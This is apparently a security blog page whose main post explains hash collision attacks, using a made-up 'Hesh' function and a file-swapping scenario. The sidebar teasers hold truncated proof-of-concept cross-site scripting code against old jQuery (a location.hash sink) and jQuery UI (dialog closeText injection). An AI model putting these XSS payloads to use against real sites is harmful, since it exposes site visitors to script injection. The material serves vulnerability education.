Hash Collision Attack

In cryptography, a collision attack on a cryptographic hash tries to find two inputs producing the same hash value, i.e. a hash collision.

A Collision Attack is an attempt to find two input strings of a hash function that produces the same hash result. Because hash functions have infinite input length and a predefined output length, there is inevitably going to be the possibility of two different inputs that produce the same output hash. If two separate inputs produce the same hash output, it is called a collision. This collision can then be exploited by any application that compares two hashes together – such as password hashes, file integrity checks, etc.

For example, let’s say we have a hypothetical hash function called “Hesh”. A collision attack would first start with a starting input value, and hash it.

Hesh(hello) = 89232323

Now the attacker needs to find a collision – a different input that generates the same hash as the previous input. This would generally be done through a brute-force method (trying all possible combinations) until one was found. Let’s say we found a collision for this input in our hypothetical hash function.


Hesh(asdfghjklzxcvbnmqwertyuiop) = 89232323

The attacker now knows two inputs with the same resulting hash. As an example for a practical use of this – if the attacker was offering a file download and showed the hash to prove the file’s integrity, he could switch out the file download but the hash would remain the same. The file would appear valid as it has the same hash as the supposed real file, but he could swap out the correct file for the collision instead, without it being obvious to the file validator.

So – are hash collisions realistically feasible? Yes, depending on the hash function. Md5 and even SHA-1 have been shown to not be very collision resistant – however SHA-256 and above seem to be safe at the current time. Here’s a visual example of what a collision attack might entail on an md5 hash. Can you figure out what this md5’s input was?

Comments

Post a Comment

Popular posts from this blog

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

Image
This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </bo...
Read more

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>ale...
Read more

Yahoo Rolls Out Security Scanning Platform Gryffin: Here's What You Can Do With It

Image
Yahoo launches a new open-source project that will allow system administrators to perform URL scanning in order to find the presence of common security vulnerabilities and malicious web content. Dubbed " Project Gryffin ," it will initially launch in beta and will be under the BSD-style license, the type of license that Yahoo likes to use whenever it is launching open source projects. According to Yahoo, Gryffin is a large-scale Web security scanning platform designed to address two specific issues namely Coverage and Scale . Coverage is said to be made up of two dimensions. The first one, crawl, refers to having the ability to find as much of the application's footprint as possible. The second dimension, scan , refers to having the ability to test each application part based on applied set of vulnerabilities. Scale is obviously implied for large Web, while Coverage has two dimensions – Crawl and Fuzzing. Crawl's ability is to find as much...
Read more